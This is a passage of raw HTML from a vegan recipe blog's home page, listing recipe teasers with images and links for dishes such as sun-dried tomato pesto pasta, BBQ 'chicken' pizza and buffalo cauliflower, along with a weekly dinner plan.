title="Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas is a quick and easy dinner - ready in less than 30 minutes and filled with bright and fresh flavors | ThisSavoryVegan.com #thissavoryvegan #vegan #veganpasta" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-sun-dried-tomato-pesto-with-spring-peas/">Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas</a></h2></header><div class="entry-content"><p>This Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas is a quick and easy dinner - ready in less than 30 minutes and filled with bright and fresh ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/vegan-sun-dried-tomato-pesto-with-spring-peas/">Read More</a></p></p></div></article><article class="simple-grid one-half odd first post-4282 post type-post status-publish format-standard has-post-thumbnail category-breakfast-brunch category-recipes category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/avocado-hummus-toast-with-burst-tomatoes/" title="Avocado Hummus Toast with Burst Tomatoes" class="alignnone"><img width="680" height="900" src="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Avocado Hummus Toast with Burst Tomatoes is the perfect breakfast for the warmer months. Creamy, crunchy and totally delicious! | ThisSavoryVegan.com #thissavoryvegan #avocadotoast" itemprop="image" srcset="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=680%2C900&amp;ssl=1 680w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=340%2C450&amp;ssl=1 340w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/avocado-hummus-toast-with-burst-tomatoes/">Avocado Hummus Toast with Burst Tomatoes</a></h2></header><div class="entry-content"><p>This Avocado Hummus Toast with Burst Tomatoes is the perfect breakfast for the warmer months. Creamy, crunchy and totally delicious! Just when ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/avocado-hummus-toast-with-burst-tomatoes/">Read More</a></p></p></div></article><article class="simple-grid one-half post-4253 post type-post status-publish format-standard has-post-thumbnail category-entrees category-pizza category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-bbq-chicken-pizza/" title="Vegan BBQ Chicken Pizza" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan BBQ Chicken Pizza is made extra crispy and delicious by using a cast iron skillet. Top it off with vegan ranch and fresh cilantro! | ThisSavoryVegan.com #thissavoryvegan #vegan #veganpizza" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-bbq-chicken-pizza/">Vegan BBQ Chicken Pizza</a></h2></header><div class="entry-content"><p>This Vegan BBQ Chicken Pizza is made extra crispy and delicious by using a cast iron skillet. Top it off with vegan ranch and fresh ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/vegan-bbq-chicken-pizza/">Read More</a></p></p></div></article><article class="simple-grid one-half odd first post-4256 post type-post status-publish format-standard has-post-thumbnail category-recipes category-salad entry"><a href="https://www.thissavoryvegan.com/vegan-mediterranean-couscous-salad/" title="Vegan Mediterranean Couscous Salad" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/mediterranean-couscous-salad.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan Mediterranean Couscous Salad is packed full of pearl couscous, chickpeas, sun-dried tomatoes, cherry tomatoes, pesto and arugula | ThisSavoryVegan.com #thissavoryvegan #vegan #vegansalad" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/mediterranean-couscous-salad.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/mediterranean-couscous-salad.jpg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/mediterranean-couscous-salad.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/mediterranean-couscous-salad.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-mediterranean-couscous-salad/">Vegan Mediterranean Couscous Salad</a></h2></header><div class="entry-content"><p>This Vegan Mediterranean Couscous Salad is packed full of pearl couscous, chickpeas, sun-dried tomatoes, cherry tomatoes, pesto and ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/vegan-mediterranean-couscous-salad/">Read More</a></p></p></div></article><article class="simple-grid one-half post-4228 post type-post status-publish format-standard has-post-thumbnail category-casseroles category-entrees category-pasta category-recipes category-skillet-meals entry"><a href="https://www.thissavoryvegan.com/vegan-sausage-spinach-skillet-lasagna/" title="Vegan Sausage &#038; Spinach Skillet Lasagna" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sausage-spinach-skillet-lasagna-4.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan Sausage &amp; Spinach Skillet Lasagna is filled with tofu ricotta, fresh pesto and spicy vegan sausage. So freaking tasty! | ThisSavoryVegan.com #thissavoryvegan #veganlasagna #vegan" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sausage-spinach-skillet-lasagna-4.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sausage-spinach-skillet-lasagna-4.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sausage-spinach-skillet-lasagna-4.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sausage-spinach-skillet-lasagna-4.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-sausage-spinach-skillet-lasagna/">Vegan Sausage &#038; Spinach Skillet Lasagna</a></h2></header><div class="entry-content"><p>This Vegan Sausage &amp; Spinach Skillet Lasagna is filled with tofu ricotta, fresh pesto and spicy vegan sausage. So freaking tasty! Oh lordy ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/vegan-sausage-spinach-skillet-lasagna/">Read More</a></p></p></div></article></div></section> <section id="text-2" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div align="right"> <a href="https://thissavoryvegan.com/blog/page/2/">See More Recipes &rarr;</a> </div></div> </div></section> </div> <!-- end .home-middle --><div class="widget-area home-bottom"><section id="featured-post-24" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">This Week&#8217;s Dinner Plan</h3> <article class="post-4379 post type-post status-publish format-standard has-post-thumbnail category-weekly-dinner-plans entry"><a href="https://www.thissavoryvegan.com/weekly-vegan-dinner-plan-60/" title="Weekly Vegan Dinner Plan #60" class="alignleft"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/weekly-vegan-dinner-plan-60.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="Weekly Vegan Dinner Plan #60 - five nights worth of vegan dinners to help inspire your menu. Choose one recipe to add to your rotation or make them all - shopping list included | ThisSavoryVegan.com #thissavoryvegan #mealprep #dinnerplan" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/weekly-vegan-dinner-plan-60.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/weekly-vegan-dinner-plan-60.jpg?resize=340%2C450&amp;ssl=1 340w" sizes="(max-width: 680px) 100vw, 680px" /></a><div class="entry-content"><p>Weekly Vegan Dinner Plan #60 &#8211; five nights worth of vegan dinners to help inspire your menu. Choose one recipe to add to your rotation or make them all &#8211; shopping list included. If you&#8217;re making all 5 recipes be sure to print the grocery list at the bottom of the page. Want to check&#8230;</p> <p><a class="more-link" href="https://www.thissavoryvegan.com/weekly-vegan-dinner-plan-60/">Read More</a></p> </div></article></div></section> <section id="featured-post-20" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Pizza All Day Every Day</h3> <article class="simple-grid one-fourth odd first post-4253 post type-post status-publish format-standard has-post-thumbnail category-entrees category-pizza category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-bbq-chicken-pizza/" title="Vegan BBQ Chicken Pizza" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan BBQ Chicken Pizza is made extra crispy and delicious by using a cast iron skillet. Top it off with vegan ranch and fresh cilantro! | ThisSavoryVegan.com #thissavoryvegan #vegan #veganpizza" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-bbq-chicken-pizza-4.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-bbq-chicken-pizza/">Vegan BBQ Chicken Pizza</a></h2></header></article><article class="simple-grid one-fourth post-3798 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-pizza category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-ricotta-zucchini-flatbreads/" title="Vegan Ricotta Zucchini Flatbreads" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/01/vegan-ricotta-zucchini-flatbreads.jpeg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="These Vegan Ricotta Zucchini Flatbreads are topped with homemade tofu ricotta, thin zucchini slices, basil and almonds. Simple and delicious! | ThisSavoryVegan.com #thissavoryvegan #veganpizza" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/01/vegan-ricotta-zucchini-flatbreads.jpeg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/01/vegan-ricotta-zucchini-flatbreads.jpeg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/01/vegan-ricotta-zucchini-flatbreads.jpeg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/01/vegan-ricotta-zucchini-flatbreads.jpeg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-ricotta-zucchini-flatbreads/">Vegan Ricotta Zucchini Flatbreads</a></h2></header></article><article class="simple-grid one-fourth odd post-3459 post type-post status-publish format-standard has-post-thumbnail category-entrees category-pizza category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-cherry-tomato-ricotta-flatbreads/" title="Vegan Cherry Tomato Ricotta Flatbreads" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/09/vegan-cherry-tomato-ricotta-flatbread.jpeg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="These Vegan Cherry Tomato Ricotta Flatbreads are simple to make, easier to eat and perfect for a quick dinner or party appetizer | ThisSavoryVegan.com #thissavoryvegan #veganpizza" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/09/vegan-cherry-tomato-ricotta-flatbread.jpeg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/09/vegan-cherry-tomato-ricotta-flatbread.jpeg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/09/vegan-cherry-tomato-ricotta-flatbread.jpeg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/09/vegan-cherry-tomato-ricotta-flatbread.jpeg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-cherry-tomato-ricotta-flatbreads/">Vegan Cherry Tomato Ricotta Flatbreads</a></h2></header></article><article class="simple-grid one-fourth post-2774 post type-post status-publish format-standard has-post-thumbnail category-pizza category-recipes entry"><a href="https://www.thissavoryvegan.com/spring-greens-pesto-pizza/" title="Spring Greens Pesto Pizza" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/03/spring-greens-pesto-pizza-3.jpeg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="A fresh mix of flavors and veggies comes together with this Spring Greens Pesto Pizza. A crunchy crust, fresh pesto, sun-dried tomatoes, chickpeas, asparagus, peas and arugula make a light vegan pizza! | ThisSavoryVegan.com #vegan #veganpizza" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/03/spring-greens-pesto-pizza-3.jpeg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/03/spring-greens-pesto-pizza-3.jpeg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/03/spring-greens-pesto-pizza-3.jpeg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2018/03/spring-greens-pesto-pizza-3.jpeg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/spring-greens-pesto-pizza/">Spring Greens Pesto Pizza</a></h2></header></article></div></section> <section id="featured-post-21" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Dinner in 30 or less</h3> <article class="simple-grid one-fourth odd first post-4320 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-pasta category-recipes category-skillet-meals entry"><a href="https://www.thissavoryvegan.com/creamy-vegan-sausage-pasta-skillet/" title="Creamy Vegan Sausage &#038; Pasta Skillet" class="alignnone"><img width="680" height="900" src="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="The perfect weeknight dinner, this Creamy Vegan Sausage &amp; Pasta Skillet is ready in less than 30 minutes and requires just a few ingredients! | ThisSavoryVegan.com #thissavoryvegan #veganpasta #skilletmeal" itemprop="image" srcset="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=680%2C900&amp;ssl=1 680w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=340%2C450&amp;ssl=1 340w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/creamy-vegan-sausage-pasta-skillet/">Creamy Vegan Sausage &#038; Pasta Skillet</a></h2></header></article><article class="simple-grid one-fourth post-4308 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-pasta category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-sun-dried-tomato-pesto-with-spring-peas/" title="Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas is a quick and easy dinner - ready in less than 30 minutes and filled with bright and fresh flavors | ThisSavoryVegan.com #thissavoryvegan #vegan #veganpasta" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/vegan-sun-dried-tomato-pesto-pasta-spring-peas-2.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-sun-dried-tomato-pesto-with-spring-peas/">Vegan Sun-Dried Tomato Pesto Pasta with Spring Peas</a></h2></header></article><article class="simple-grid one-fourth odd post-4180 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-recipes category-salad entry"><a href="https://www.thissavoryvegan.com/vegan-avocado-kale-caesar-everything-bagel-croutons/" title="Vegan Avocado Kale Caesar with Everything Bagel Croutons" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/vegan-avocado-kale-caesar-salad-5.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Vegan Avocado Kale Caesar with Everything Bagel Croutons is going to be your go-to salad. Homemade croutons and the BEST tahini dressing | ThisSavoryVegan.com #thissavoryvegan #vegan #vegancaesar" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/vegan-avocado-kale-caesar-salad-5.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/vegan-avocado-kale-caesar-salad-5.jpg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/vegan-avocado-kale-caesar-salad-5.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/vegan-avocado-kale-caesar-salad-5.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/vegan-avocado-kale-caesar-everything-bagel-croutons/">Vegan Avocado Kale Caesar with Everything Bagel Croutons</a></h2></header></article><article class="simple-grid one-fourth post-4184 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-recipes category-sandwiches-wraps-burgers entry"><a href="https://www.thissavoryvegan.com/roasted-eggplant-sandwiches-vegan-arugula-walnut-pesto/" title="Roasted Eggplant Sandwiches with Vegan Arugula Walnut Pesto" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/roasted-eggplant-sandwich-vegan-arugula-pesto-3.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="These Roasted Eggplant Sandwiches with Vegan Arugula Walnut Pesto are packed with roasted red peppers, eggplant, fresh arugula and pesto mayo | ThisSavoryVegan.com #thissavoryvegan #vegan #vegansandwich" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/roasted-eggplant-sandwich-vegan-arugula-pesto-3.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/roasted-eggplant-sandwich-vegan-arugula-pesto-3.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/roasted-eggplant-sandwich-vegan-arugula-pesto-3.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/roasted-eggplant-sandwich-vegan-arugula-pesto-3.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/roasted-eggplant-sandwiches-vegan-arugula-walnut-pesto/">Roasted Eggplant Sandwiches with Vegan Arugula Walnut Pesto</a></h2></header></article></div></section> <section id="featured-post-23" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Munchies</h3> <article class="simple-grid one-fourth odd first post-4333 post type-post status-publish format-standard has-post-thumbnail category-recipes category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/the-best-baked-buffalo-cauliflower/" title="The Best Baked Buffalo Cauliflower" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="Flavored from the inside out and perfectly crispy, this really is The Best Baked Buffalo Cauliflower out there. Served with vegan ranch! | ThisSavoryVegan.com #thissavoryvegan #buffalocauliflower #vegan" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/the-best-baked-buffalo-cauliflower/">The Best Baked Buffalo Cauliflower</a></h2></header></article><article class="simple-grid one-fourth post-4282 post type-post status-publish format-standard has-post-thumbnail category-breakfast-brunch category-recipes category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/avocado-hummus-toast-with-burst-tomatoes/" title="Avocado Hummus Toast with Burst Tomatoes" class="alignnone"><img width="680" height="900" src="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Avocado Hummus Toast with Burst Tomatoes is the perfect breakfast for the warmer months. Creamy, crunchy and totally delicious! | ThisSavoryVegan.com #thissavoryvegan #avocadotoast" itemprop="image" srcset="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=680%2C900&amp;ssl=1 680w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?resize=340%2C450&amp;ssl=1 340w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/04/avocado-hummus-toast-cherry-tomatoes.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/avocado-hummus-toast-with-burst-tomatoes/">Avocado Hummus Toast with Burst Tomatoes</a></h2></header></article><article class="simple-grid one-fourth odd post-4140 post type-post status-publish format-standard has-post-thumbnail category-recipes category-salad category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/tomato-corn-avocado-pasta-salad/" title="Tomato Corn Avocado Pasta Salad" class="alignnone"><img width="680" height="900" src="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/corn-tomato-avocado-pasta-salad.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="This Tomato Corn Avocado Pasta Salad is filled with fresh ingredients and topped with a light and zesty dressing. Perfect party side dish | ThisSavoryVegan.com #thissavoryvegan #vegan #partyfood" itemprop="image" srcset="https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/corn-tomato-avocado-pasta-salad.jpg?resize=680%2C900&amp;ssl=1 680w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/corn-tomato-avocado-pasta-salad.jpg?resize=340%2C450&amp;ssl=1 340w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/corn-tomato-avocado-pasta-salad.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i2.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/03/corn-tomato-avocado-pasta-salad.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/tomato-corn-avocado-pasta-salad/">Tomato Corn Avocado Pasta Salad</a></h2></header></article><article class="simple-grid one-fourth post-4108 post type-post status-publish format-standard has-post-thumbnail category-breakfast-brunch category-recipes category-sandwiches-wraps-burgers category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/chipotle-lentil-avocado-toast/" title="Chipotle Lentil Avocado Toast" class="alignnone"><img width="680" height="900" 